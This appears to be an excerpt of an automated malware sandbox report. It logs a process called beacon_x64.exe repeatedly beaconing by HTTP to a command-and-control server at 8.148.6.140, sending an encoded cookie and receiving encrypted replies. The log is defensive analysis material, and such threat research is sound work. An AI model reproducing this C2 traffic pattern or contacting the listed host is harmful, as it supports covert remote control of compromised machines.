6d 50 72 71 34 4f 56 78 71 79 6d 74 51 4e 34 63 76 4f 66 4e 2b 47 63 53 74 69 4b 55 48 4d 6a 4c 48 4a 6a 77 34 33 46 36 63 4d 2f 42 49 56 4c 65 77 34 [TRUNCATED]
          Data Ascii: V1Pao49m/SWVP5zoWVyHEKTvauW0jOk74uIO2jCow7BW8X76aFn8aOIjvH6gFrgQOoAs447Cqf9tAchNLZxaLOm/pJ4X5UeeUzyitwhWZYToM2OTpSD9XrprGtpHjGvgJ3HnEGZ6DiPmjywMEL5IAUad9Q1m46EX8ZS63BGrH956PUqrSAccLst73jiTyRY+58plIJa1T9aoivBYgNxab94GBNCWQ7aVXtl8A/5IbHaVa9a5LcQCSvUDzgUw/HDHdJ0/7jQOs5FMS+uqptmaBCiuOUAN+2hrmPrq4OVxqymtQN4cvOfN+GcStiKUHMjLHJjw43F6cM/BIVLew4q6iw==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          113192.168.2.6501018.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:22.281198978 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:23.276449919 CET184INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:23 GMT
          Server: nginx
          Content-Length: 88
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:28:23.276518106 CET88INData Raw: 4d 69 36 7a 4d 35 30 50 4b 55 49 31 63 63 2b 63 64 35 69 64 75 72 68 46 50 32 4b 55 64 6b 31 6d 57 53 53 45 6e 66 41 49 61 65 55 30 6b 48 72 52 37 70 55 66 4c 54 51 4f 4a 50 4f 2f 75 72 38 56 52 63 48 4a 70 64 74 2f 34 43 5a 62 49 42 6f 4e 6f 32
          Data Ascii: Mi6zM50PKUI1cc+cd5idurhFP2KUdk1mWSSEnfAIaeU0kHrR7pUfLTQOJPO/ur8VRcHJpdt/4CZbIBoNo2Br+A==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          114192.168.2.6501028.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:23.392055035 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          115192.168.2.6501038.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:24.365695953 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          116192.168.2.6501048.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:25.373895884 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          117192.168.2.6501068.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:26.421905041 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:27.488518000 CET529INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:27 GMT
          Server: nginx
          Content-Length: 344
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 49 4f 54 48 38 30 5a 50 73 41 6e 79 61 50 4c 31 5a 67 48 54 57 73 48 36 2f 7a 61 35 63 62 52 47 54 48 2b 6a 71 6d 79 56 42 2b 4f 6a 61 6c 54 32 70 50 63 6d 63 33 6e 7a 63 71 73 70 70 32 48 59 41 72 48 34 4d 70 79 53 5a 47 43 48 31 57 4e 48 4d 5a 37 6b 65 39 47 67 2b 45 30 66 42 66 45 4f 35 5a 56 2b 6b 36 78 57 2f 6f 53 6a 61 45 48 51 4b 4a 2f 2f 37 73 79 43 79 76 52 34 44 69 69 38 68 51 65 62 45 57 31 6c 48 49 6c 4e 46 4d 39 42 78 6e 75 52 57 51 78 2f 42 6b 64 46 50 4d 50 4e 52 74 4c 75 34 49 42 65 34 6e 54 4f 55 57 36 58 51 56 33 6a 64 63 77 74 36 69 51 69 46 2f 77 67 71 46 6b 43 70 64 68 65 42 42 46 42 46 75 39 52 6e 68 63 46 6d 59 44 65 32 44 77 37 31 58 64 4a 56 57 36 61 53 31 78 64 31 45 50 58 70 47 35 63 67 77 50 4c 57 63 6d 32 50 39 35 43 39 4b 38 2f 32 68 6a 4a 72 30 50 54 50 71 4b 68 61 34 71 34 2f 46 34 33 43 56 4d 38 74 48 54 33 70 6e 76 39 52 35 4a 41 42 31 34 37 37 6a 42 2b 42 31 70 64 42 6b 4d 77 70 72 44 76 58 57 77 43 65 77 44 74 53 5a 56 6d 64 2f 6c 6b 33 63 4c 44 66 45 30 56 55 55 [TRUNCATED]
          Data Ascii: IOTH80ZPsAnyaPL1ZgHTWsH6/za5cbRGTH+jqmyVB+OjalT2pPcmc3nzcqspp2HYArH4MpySZGCH1WNHMZ7ke9Gg+E0fBfEO5ZV+k6xW/oSjaEHQKJ//7syCyvR4Dii8hQebEW1lHIlNFM9BxnuRWQx/BkdFPMPNRtLu4IBe4nTOUW6XQV3jdcwt6iQiF/wgqFkCpdheBBFBFu9RnhcFmYDe2Dw71XdJVW6aS1xd1EPXpG5cgwPLWcm2P95C9K8/2hjJr0PTPqKha4q4/F43CVM8tHT3pnv9R5JAB1477jB+B1pdBkMwprDvXWwCewDtSZVmd/lk3cLDfE0VUURY/A==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          118192.168.2.6501078.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:27.611368895 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          119192.168.2.6501088.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:28.570034027 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:32.563205957 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:32 GMT
          Server: nginx
          Content-Length: 300
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:28:32.563323975 CET300INData Raw: 4f 70 75 55 67 36 48 30 75 33 4f 76 5a 47 71 79 31 73 6c 47 65 68 2b 75 63 5a 4e 38 31 59 56 5a 73 4b 6e 4f 6a 4f 68 57 54 56 58 7a 74 47 69 51 41 37 55 75 4b 70 4c 35 79 59 4d 43 2f 4c 7a 34 5a 50 51 41 78 5a 55 62 32 52 6c 79 35 58 4f 61 62 56
          Data Ascii: OpuUg6H0u3OvZGqy1slGeh+ucZN81YVZsKnOjOhWTVXztGiQA7UuKpL5yYMC/Lz4ZPQAxZUb2Rly5XOabV6pdrk+y9gxJUTQEwCtAbcjhUKU4siizbDqACVB0v1JJezwMW2z9cfdsHHO+7OSFKE2lziTg/DnhyWlxppRNS7lTWIqrF92yQbUCncQqYHwayTDPi1YO7N9xelXzMwNkwM1IvTui2etis0aFRoiDAONaiYpO3lKy9e


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          120192.168.2.6501098.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:32.688064098 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          121192.168.2.6501108.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:33.671336889 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination Port
          122192.168.2.6501118.148.6.14080
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:34.797946930 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:35.782660961 CET529INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:35 GMT
          Server: nginx
          Content-Length: 344
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 67 46 46 62 45 52 34 6b 33 59 46 74 5a 59 65 36 36 4f 7a 6d 6f 78 70 38 73 4c 6b 56 46 66 6d 47 57 2b 78 37 6e 49 76 32 6a 2f 2f 39 35 4e 4c 49 55 65 4e 34 4a 69 38 49 62 31 44 39 4d 4c 72 49 56 68 47 56 51 77 70 6e 32 67 31 52 31 6b 42 76 78 47 41 78 51 51 5a 53 6f 75 35 50 4d 41 62 2b 31 70 49 79 49 77 56 39 76 33 64 50 76 72 56 42 35 42 4e 5a 6d 6e 4c 55 42 6d 67 61 4d 6d 46 42 75 6b 36 63 76 75 78 55 47 4c 36 47 30 6c 74 61 32 5a 39 6d 33 52 30 44 33 56 77 41 4d 48 58 44 38 59 6c 42 36 42 70 36 67 79 73 36 72 4e 6a 73 32 71 4c 70 78 4e 6f 70 71 7a 38 56 6b 7a 44 6f 62 43 42 55 57 70 58 4c 69 62 45 6a 72 47 4f 59 4b 52 71 38 66 50 79 61 36 39 35 61 61 75 45 78 6c 6d 46 4a 36 72 63 2f 4e 55 6e 32 38 64 38 2f 34 54 51 66 4b 33 61 46 61 66 35 63 4c 77 32 67 39 51 2f 66 66 4c 30 50 35 6c 66 61 69 50 5a 38 4f 37 4d 50 6e 65 45 73 66 57 71 56 64 30 6c 4c 42 58 61 69 68 4b 4f 61 51 32 75 6a 58 72 79 45 39 6c 75 35 31 31 6b 62 35 6c 56 58 38 37 55 41 56 42 36 65 32 6a 55 62 37 4b 2b 58 41 32 71 70 47 69 [TRUNCATED]
          Data Ascii: gFFbER4k3YFtZYe66Ozmoxp8sLkVFfmGW+x7nIv2j//95NLIUeN4Ji8Ib1D9MLrIVhGVQwpn2g1R1kBvxGAxQQZSou5PMAb+1pIyIwV9v3dPvrVB5BNZmnLUBmgaMmFBuk6cvuxUGL6G0lta2Z9m3R0D3VwAMHXD8YlB6Bp6gys6rNjs2qLpxNopqz8VkzDobCBUWpXLibEjrGOYKRq8fPya695aauExlmFJ6rc/NUn28d8/4TQfK3aFaf5cLw2g9Q/ffL0P5lfaiPZ8O7MPneEsfWqVd0lLBXaihKOaQ2ujXryE9lu511kb5lVX87UAVB6e2jUb7K+XA2qpGiEWyg==


          Session IDSource IPSource PortDestination IPDestination Port
          123192.168.2.6501128.148.6.14080
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:35.906119108 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:39.896015882 CET465INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:39 GMT
          Server: nginx
          Content-Length: 280
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 55 73 59 62 69 32 2f 4e 30 58 71 6f 71 50 39 75 59 41 64 58 53 30 63 77 57 5a 73 54 7a 4b 75 37 2f 50 36 4e 64 43 67 31 39 48 66 53 4f 6f 31 57 56 36 4a 42 6c 33 73 75 6f 56 79 43 51 30 34 4f 30 79 76 65 32 74 6c 61 6a 78 76 59 75 30 56 53 47 4d 6f 50 72 73 5a 6b 4b 42 6b 43 67 39 4b 69 4d 54 36 64 74 4f 57 42 43 59 54 50 4c 57 34 69 4d 47 39 63 4b 5a 52 56 38 4c 34 49 34 36 37 4e 67 6e 61 71 42 42 77 4b 2f 6d 48 49 4f 35 33 38 4d 32 71 38 2b 34 73 61 78 50 6c 52 4f 62 61 58 4c 72 47 68 75 75 75 56 47 2f 49 6b 6a 42 4c 73 43 6e 74 39 52 50 41 65 4e 79 77 75 45 68 58 33 6a 32 61 76 56 76 7a 2b 54 4c 6d 34 43 61 32 4c 38 67 47 44 4b 61 42 35 45 2b 5a 47 45 36 76 68 5a 6d 2b 78 71 56 39 4c 54 6f 77 69 2b 6a 78 61 66 53 57 73 32 54 33 76 4a 39 45 4a 71 44 4a 52 47 72 52 63 33 54 2b 48 32 33 77 6f 6c 4c 7a 38 65 61 2f 33 43 77 3d 3d
          Data Ascii: UsYbi2/N0XqoqP9uYAdXS0cwWZsTzKu7/P6NdCg19HfSOo1WV6JBl3suoVyCQ04O0yve2tlajxvYu0VSGMoPrsZkKBkCg9KiMT6dtOWBCYTPLW4iMG9cKZRV8L4I467NgnaqBBwK/mHIO538M2q8+4saxPlRObaXLrGhuuuVG/IkjBLsCnt9RPAeNywuEhX3j2avVvz+TLm4Ca2L8gGDKaB5E+ZGE6vhZm+xqV9LTowi+jxafSWs2T3vJ9EJqDJRGrRc3T+H23wolLz8ea/3Cw==


          Session IDSource IPSource PortDestination IPDestination Port
          124192.168.2.6501138.148.6.14080
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:40.016556978 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:40.965547085 CET529INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:40 GMT
          Server: nginx
          Content-Length: 344
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 4a 31 6c 79 4d 79 35 6f 74 56 43 49 62 54 76 42 77 7a 64 67 78 53 4c 67 34 46 35 33 6a 7a 70 5a 49 2b 62 58 74 64 33 6d 6b 31 74 66 36 52 55 33 4e 59 67 44 7a 78 48 47 30 6e 6d 54 7a 4f 50 56 55 58 59 67 52 39 7a 6d 69 44 6c 54 79 4b 31 37 43 71 4e 31 33 7a 76 59 33 47 6f 43 64 71 49 61 72 76 62 6f 2b 4a 39 4b 67 52 58 33 73 46 2b 42 68 4a 70 5a 66 51 45 6e 57 58 54 45 35 6a 51 4a 33 67 48 6b 50 79 2b 37 62 37 67 65 6b 52 75 69 4f 2f 74 4d 56 6a 4d 53 51 57 62 62 74 70 6f 43 55 66 31 4f 30 4b 4e 74 64 43 39 57 34 4e 61 59 6a 6f 35 45 68 74 4e 6a 7a 43 57 6b 32 57 50 51 4a 64 44 78 6b 31 2b 6c 45 6c 63 42 5a 2f 66 59 67 6b 32 72 49 63 53 51 6b 37 42 30 71 65 5a 6d 41 74 37 4b 57 79 30 35 67 4f 47 4d 4f 39 59 62 64 65 6f 6c 78 67 67 4a 35 71 44 55 4b 4c 2b 4a 6f 69 33 50 36 7a 52 6a 56 52 4b 77 72 6a 6f 32 49 65 75 51 59 53 79 50 70 57 58 2b 54 55 53 33 43 5a 64 74 34 48 65 51 6e 4b 32 71 2f 45 79 39 48 36 44 56 4a 50 4a 6e 79 32 73 70 48 69 69 67 4c 43 31 79 54 4f 37 38 67 5a 49 2f 2f 6e 49 54 31 41 [TRUNCATED]
          Data Ascii: J1lyMy5otVCIbTvBwzdgxSLg4F53jzpZI+bXtd3mk1tf6RU3NYgDzxHG0nmTzOPVUXYgR9zmiDlTyK17CqN13zvY3GoCdqIarvbo+J9KgRX3sF+BhJpZfQEnWXTE5jQJ3gHkPy+7b7gekRuiO/tMVjMSQWbbtpoCUf1O0KNtdC9W4NaYjo5EhtNjzCWk2WPQJdDxk1+lElcBZ/fYgk2rIcSQk7B0qeZmAt7KWy05gOGMO9YbdeolxggJ5qDUKL+Joi3P6zRjVRKwrjo2IeuQYSyPpWX+TUS3CZdt4HeQnK2q/Ey9H6DVJPJny2spHiigLC1yTO78gZI//nIT1Az7Fw==


          Session IDSource IPSource PortDestination IPDestination Port
          125192.168.2.6501148.148.6.14080
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:41.082988977 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:42.057889938 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:41 GMT
          Server: nginx
          Content-Length: 364
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:28:42.057915926 CET364INData Raw: 65 2f 4f 4d 59 71 2f 43 6f 37 2b 4f 34 4b 70 31 47 73 70 59 66 4c 44 50 4c 70 6c 56 4a 30 7a 45 65 66 52 4f 70 4e 7a 6f 6f 54 46 6f 51 6c 71 38 6b 74 39 62 69 33 7a 45 4b 66 43 6f 43 67 71 51 44 62 48 51 34 32 2b 42 37 72 61 4d 52 47 51 75 71 34
          Data Ascii: e/OMYq/Co7+O4Kp1GspYfLDPLplVJ0zEefROpNzooTFoQlq8kt9bi3zEKfCoCgqQDbHQ42+B7raMRGQuq4LcEBq5tJji4jOJfnbdjCiRAwLBoOujB1Nd5a7OBH8t/+KolgJZOjvmyTDrZ1pbzVR7VNc5QfkkyacoFaiFLT0Ezg1/9joTs4qxAUbLa6RnrSCGoNsI7WTZ/MPNFEAylWvvlY8YS1oLaezdy8pUalcCsuqY6EyL69h


          Session IDSource IPSource PortDestination IPDestination Port
          126192.168.2.6501158.148.6.14080
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:42.187005997 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:43.160495996 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:28:43 GMT
          Server: nginx
          Content-Length: 192
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:28:43.160594940 CET192INData Raw: 41 78 4f 66 76 42 62 54 4b 7a 2f 2b 35 44 4e 32 4b 36 36 52 4e 5a 33 78 56 42 77 35 4c 57 50 49 65 75 4d 44 4d 65 2b 6c 32 53 4a 43 5a 4e 62 43 45 61 4e 4a 37 69 55 78 61 52 51 78 79 6b 57 54 37 38 70 67 41 63 30 37 73 77 6c 4a 52 5a 71 4a 6b 59
          Data Ascii: AxOfvBbTKz/+5DN2K66RNZ3xVBw5LWPIeuMDMe+l2SJCZNbCEaNJ7iUxaRQxykWT78pgAc07swlJRZqJkY8y7ntdQHfNz480VG9YtXyHzqpnQZ141UniED5nWGIQKOW7J6jKUSeVPItkQzb4H1jRIYZduBm8ZxMa/pyys29KVG5McVufqh+jDhLjqMZQEd5z


          Session IDSource IPSource PortDestination IPDestination Port
          127192.168.2.6501168.148.6.14080
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:28:43.283855915 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:28:44.248059034 CET465INHTTP/1.1 200 OK
